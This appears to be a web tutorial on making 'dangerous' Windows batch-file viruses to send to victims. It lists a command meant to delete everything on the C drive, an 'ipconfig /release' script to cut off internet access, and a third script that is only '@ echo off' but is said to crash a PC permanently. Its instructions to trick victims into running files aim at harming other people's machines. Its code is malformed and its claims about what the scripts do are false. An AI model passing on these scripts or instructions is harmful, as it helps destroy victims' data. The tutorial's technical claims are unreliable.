Steps To Create Dangerous Computer/ PC virus In 2 min

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#1. Create A Most Dangerous Notepad Virus
  • First open your notepad in your window OS.
  • Then copy and paste the code lying below in your notepad application
@Echo off
Del C: *.* |y
  • Then save this data as file name Way2Us.bat
Now running this file in victim computer will clear all the data of C drive completely, and the Os will get corrupted.

#2. Virus to stop victim access to internet
This you can use to stop someone's access to internet.
  • Open notepad and copy this below code to notepad.
@Echo off
Ipconfig /release

Now save it as in a .bat format. Name it as Way2us.bat then send it to victim. And if he click that file his ip address will be deleted. Hence he wont be able to connect to internet.
And for fixing it just type IPconfig/renew.

#3: Crash victims for ever
This is also in the list of most dangerous virus according to me as it can crash your Pc forever.
  • Open notepad and copy the code below and paste it in that.
@ echo off
  • Save it as Way2us.bat
  • Send it to victim
  • And running this file will crash victims Pc.


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